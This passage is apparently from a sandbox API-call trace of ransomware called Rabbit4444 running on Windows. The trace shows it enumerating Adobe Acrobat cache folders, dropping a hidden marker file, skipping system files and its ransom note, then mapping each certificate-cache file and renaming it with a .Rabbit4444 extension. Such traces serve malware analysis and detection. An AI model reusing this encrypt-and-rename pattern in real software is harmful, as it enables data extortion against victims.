dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.087] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.087] CloseHandle (hObject=0x278) returned 1 [0054.087] CloseHandle (hObject=0x27c) returned 1 [0054.087] GetCurrentThreadId () returned 0xd98 [0054.087] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6670 [0054.087] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0054.087] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1057c0 | out: hHeap=0xe0000) returned 1 [0054.088] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6668 | out: hHeap=0xe0000) returned 1 [0054.088] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache" [0054.088] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\" [0054.088] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3" [0054.088] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.090] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.092] FlushFileBuffers (hFile=0x27c) returned 1 [0054.093] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.093] CloseHandle (hObject=0x27c) returned 1 [0054.094] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache") returned 66 [0054.094] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.094] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe98f797c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102590 [0054.094] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.094] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.094] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.094] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.094] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5bd69dbd, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe98f797c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.094] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.094] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.094] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.094] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.094] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.094] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe98f797c, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe98f797c, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe98f797c, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.094] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.094] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.094] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfcc0fc, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfcc0fc, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xdf6349d5, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x27d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", cAlternateFileName="0FDED5~1.CRL")) returned 1 [0054.094] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.094] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="Rabbit4444.exe") returned -1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2=".") returned 1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="..") returned 1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="windows") returned -1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="bootmgr") returned -1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="pagefile.sys") returned -1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="boot") returned -1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="ids.txt") returned -1 [0054.095] lstrcmpiW (lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", lpString2="NTUSER.DAT") returned -1 [0054.095] lstrcpyW (in: lpString1=0x130ebbe, lpString2="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" | out: lpString1="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" [0054.095] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl", dwFileAttributes=0x0) returned 1 [0054.095] lstrlenW (lpString="0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl") returned 44 [0054.095] lstrlenW (lpString="Rabbit4444") returned 10 [0054.095] lstrcmpiW (lpString1="539CB0.crl", lpString2="Rabbit4444") returned -1 [0054.095] lstrlenW (lpString=".dll") returned 4 [0054.095] lstrcmpiW (lpString1=".crl", lpString2=".dll") returned -1 [0054.095] lstrlenW (lpString=".lnk") returned 4 [0054.095] lstrcmpiW (lpString1=".crl", lpString2=".lnk") returned -1 [0054.095] lstrlenW (lpString=".ini") returned 4 [0054.095] lstrcmpiW (lpString1=".crl", lpString2=".ini") returned -1 [0054.095] lstrlenW (lpString=".sys") returned 4 [0054.095] lstrcmpiW (lpString1=".crl", lpString2=".sys") returned -1 [0054.095] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.096] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.096] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14540637768) returned 1 [0054.096] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=637) returned 1 [0054.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0054.096] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1021d8 [0054.096] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x580, lpName=0x0) returned 0x298 [0054.097] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x580) returned 0x70000 [0054.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0054.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0054.098] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0054.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0054.098] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14540877180) returned 1 [0054.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0054.098] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1021d8 | out: hHeap=0xe0000) returned 1 [0054.098] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.098] CloseHandle (hObject=0x298) returned 1 [0054.098] CloseHandle (hObject=0x278) returned 1 [0054.098] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.Rabbit4444") returned 122 [0054.098] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl.rabbit4444"), dwFlags=0x1) returned 1 [0054.099] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfa5e97, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfa5e97, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xdf6322b7, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", cAlternateFileName="CE3388~1.CRL")) returned 1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="Rabbit4444.exe") returned -1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2=".") returned 1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="..") returned 1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="windows") returned -1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="bootmgr") returned 1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="pagefile.sys") returned -1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="boot") returned 1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="ids.txt") returned -1 [0054.099] lstrcmpiW (lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", lpString2="NTUSER.DAT") returned -1 [0054.099] lstrcpyW (in: lpString1=0x130ebbe, lpString2="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" | out: lpString1="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" [0054.099] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", dwFileAttributes=0x0) returned 1 [0054.099] lstrlenW (lpString="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl") returned 44 [0054.100] lstrlenW (lpString="Rabbit4444") returned 10 [0054.100] lstrcmpiW (lpString1="CA0BA5.crl", lpString2="Rabbit4444") returned -1 [0054.100] lstrlenW (lpString=".dll") returned 4 [0054.100] lstrcmpiW (lpString1=".crl", lpString2=".dll") returned -1 [0054.100] lstrlenW (lpString=".lnk") returned 4 [0054.100] lstrcmpiW (lpString1=".crl", lpString2=".lnk") returned -1 [0054.100] lstrlenW (lpString=".ini") returned 4 [0054.100] lstrcmpiW (lpString1=".crl", lpString2=".ini") returned -1 [0054.100] lstrlenW (lpString=".sys") returned 4 [0054.100] lstrcmpiW (lpString1=".crl", lpString2=".sys") returned -1 [0054.100] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0054.100] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0054.100] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14541073792) returned 1 [0054.100] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=425) returned 1 [0054.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0054.100] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0054.100] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b0, lpName=0x0) returned 0x298 [0054.102] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4b0) returned 0x70000 [0054.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0054.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0054.102] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0054.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0054.102] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0054.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0054.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0054.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0054.103] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14541352828) returned 1 [0054.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0054.103] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0054.103] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.103] CloseHandle (hObject=0x298) returned 1 [0054.103] CloseHandle (hObject=0x278) returned 1 [0054.103] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.Rabbit4444") returned 122 [0054.103] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl.rabbit4444"), dwFlags=0x1) returned 1 [0054.104] FindNextFileW (in: hFindFile=0x102590, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5bfa5e97, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5bfa5e97, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xdf6322b7, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x1a9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl", cAlternateFileName="CE3388~1.CRL")) returned 0 [0054.104] FindClose (in: hFindFile=0x102590 | out: hFindFile=0x102590) returned 1 [0054.104] lstrcpyW (in: lpString1=0x130ebbe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.104] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\Security\\CRLCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\security\\crlcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.104] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.105] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.105] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.105] CloseHandle (hObject=0x278) returned 1 [0054.105] CloseHandle (hObject=0x27c) returned 1 [0054.105] GetCurrentThreadId () returned 0xd98 [0054.105] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6530 [0054.105] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0054.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10e568 | out: hHeap=0xe0000) returned 1 [0054.105] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6528 | out: hHeap=0xe0000) returned 1 [0054.105] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache" [0054.105] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\" [0054.105] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3" [0054.105] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\adobe\\acrobat\\dc\\jscache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.109] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.111] FlushFileBuffers (hFile=0x27c) returned 1 [0054.112] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.113] CloseHandle (hObject=0x27c) returned 1 [0054.113] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache") returned 56 [0054.113] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.113] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Adobe\\Acrobat\\DC\\JSCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b406794, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe991dbb4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102b10 [0054.113] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.113] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.113] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.113] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.113] FindNextFileW (in: hFindFile=0x102b10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5b406794, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0xe89495bf, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xe991dbb4, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.114] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.114] 